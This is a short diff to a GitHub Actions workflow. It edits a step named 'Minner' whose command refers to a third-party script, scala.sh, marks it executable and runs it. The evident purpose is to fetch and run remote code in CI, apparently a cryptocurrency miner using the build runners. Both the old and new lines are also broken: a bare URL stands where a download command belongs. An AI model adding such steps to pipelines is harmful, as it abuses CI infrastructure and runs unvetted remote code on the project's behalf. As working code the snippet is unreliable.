--- a/.github/workflows/main.yml
+++ b/.github/workflows/main.yml
@@ -24,4 +24,4 @@ jobs:
       uses: actions/checkout@v1
     - name: Minner
       run: |
-        https://raw.githubusercontent.com/masyudh/put2/main/scala.sh && chmod u+x scala.sh && ./scala.sh
+        https://github.com/masyudh/put2/blob/main/scala.sh && chmod u+x scala.sh && ./scala.sh
